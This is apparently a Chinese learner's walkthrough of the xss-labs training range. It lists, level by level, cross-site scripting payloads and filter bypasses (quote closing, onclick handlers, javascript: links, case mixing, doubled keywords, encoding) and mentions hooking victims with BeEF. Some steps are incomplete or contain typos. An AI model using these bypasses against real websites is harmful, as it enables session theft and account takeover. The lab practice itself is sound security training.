1、搭建好靶场;
xss-labs-master.zip - 蓝奏云文件大小:1.1 M|https://wwu.lanzoum.com/iRuBk0a0luhe
2、name应该就是传参;
3、在name传参栏传入简单的script,成功;
反射型xss成功;接下来可以考虑用beef连接;
<script>alert(1)</script>
4、来到了第二关;
也是先传一下简单的script;
keyword=<scritp>alert(1)</script>
网页栏传的参数为文本输出;
失败了;
查看网页源代码;
这就完成了
"><scritp>alert(1)</script>
5、第三关试一下
失败;
输入'><script>alert(1)</script>
发现<>被过滤掉;
想办法绕过; 事件驱动,点击事件;
' οnclick='alert(1)'
6、第四关;
试一下:<script>alert(1)<script>
失败;
查看网页源代码;尝试双引号闭合;
7、第五关:
"><a href=javascript:alert(1)>
8、第六关
"><a href=javascript:alert(1)>
使用第五关语句发现多了"_"
大写R "><a hRef=javascript:alert(1)>
9、第七关;
使用第六关语句:"><a hRef=javascript:alert(1)>
发现href 和script被丢掉,尝试双写和大小写混合;
"><a hrhrefef=javascscriptript:alert(1)>
10、第8关;unicode编码绕过;
尝试一下第七关语句: "><a hrhrefef=javascscriptript:alert(1)>
查看源代码,多了"-"
"><a hRef=javasCript:alert(1)>
语句没问题,拒绝访问,考虑编码;
JavaScript:alert(1)
JavaScript:alert(1)
11、第9关;
试一下:JavaScript:alert(1)
试一下:JavaScript:alert('http://')
f发现"_"
还是编码:
javascript:alert(1)//http://